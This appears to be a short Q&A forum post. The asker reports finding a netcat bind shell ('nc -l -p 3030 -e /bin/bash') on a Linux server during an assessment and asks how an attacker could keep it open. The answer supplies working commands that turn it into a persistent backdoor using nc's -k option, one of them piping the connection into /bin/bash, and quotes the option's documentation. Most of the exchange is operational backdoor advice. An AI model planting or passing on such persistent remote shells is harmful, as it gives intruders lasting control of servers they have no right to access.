I have found the following command several times in one of the linux servers during an assessment:
nc -l -p 3030 -e /bin/bash
This enables a hacker to gain control over this sever via bash. By testing it, I realized that whenever the client interrupts the connection, the door is again closed.
Is there a way for the hacker to keep this door persistently opened?
Nc with -k option will help.
nc -l -k -p 3030 -e /bin/bash
nc -l -k -p 3030 | /bin/bash
Forces nc to stay listening for another connection after its current connection is completed. It is an error to use this option without the -l option. When used together with the -u option, the server socket is not connected and it can receive UDP datagrams from multiple hosts.
